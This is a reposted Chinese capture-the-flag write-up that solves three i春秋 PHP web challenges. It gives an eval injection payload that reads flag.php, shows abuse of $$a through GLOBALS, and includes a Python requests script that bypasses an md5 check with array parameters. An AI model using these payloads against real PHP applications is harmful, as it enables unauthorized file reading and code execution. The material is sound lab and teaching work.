-
爆破-1:
打开链接,是502
我直接在后面加个变量传参数:?a=1
出了一段代码
var_dump()函数中,用了$$a,可能用了超全局变量GLOBALS
给hello参数传个GLOBALS
得到flag
-
爆破-2:
打开链接
var_dump()会返回数据变量的类型和值
eval()会把字符串当作php代码
有两种方法得到flag
1:?hello=file(‘flag.php‘)
2:?hello=);show_source(‘flag.php‘);var_dump(
-
爆破-3:
打开链接,还是php代码
<?php
error_reporting(0);
session_start();
require(‘./flag.php‘);
if(!isset($_SESSION[‘nums‘])){
$_SESSION[‘nums‘] = 0;
$_SESSION[‘time‘] = time();
$_SESSION[‘whoami‘] = ‘ea‘;
}
if($_SESSION[‘time‘]+120<time()){
session_destroy();
}
$value = $_REQUEST[‘value‘];
$str_rand = range(‘a‘, ‘z‘);
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];
if($_SESSION[‘whoami‘]==($value[0].$value[1]) && substr(md5($value),5,4)==0){
$_SESSION[‘nums‘]++;
$_SESSION[‘whoami‘] = $str_rands;
echo $str_rands;
}
if($_SESSION[‘nums‘]>=10){
echo $flag;
}
show_source(__FILE__);
?>
关键几点:
变量str_rand的值是2位小写字母
如果SESSIONS中的whoami参数和参数value的值相等,并且md5()函数处理后的变量value的第5位开始往后4位等于0,nums就会加1,whoami的值就也会更新,当nums大于10的话,就能得到flag了
数组可以绕过md5的这个判断,因为md5()函数处理一个数组会返回null,null==0
第一次传参,?value[]=ea
第二次传参,?value[]=mj,以此类推
可以写个python脚本跑一下
import requests
s = requests.session()
strs = [‘abcdefghijklmnopqrstuvwxyz‘]
url = "http://b9998c89f8054c61b75dcf6d48d1d164707c9299b7f949f4.game.ichunqiu.com/?value[]=ea"
r = s.get(url)
for i in range(10):
url_1 = "http://b9998c89f8054c61b75dcf6d48d1d164707c9299b7f949f4.game.ichunqiu.com/?value[]=" + r.text[:2]
r = s.get(url_1)
print(r.url)
if ‘flag{‘ in r.text:
print(r.text)
运行结果
得到flag
原文地址:https://www.cnblogs.com/sch01ar/p/8904178.html
时间: 2024-10-09 00:06:46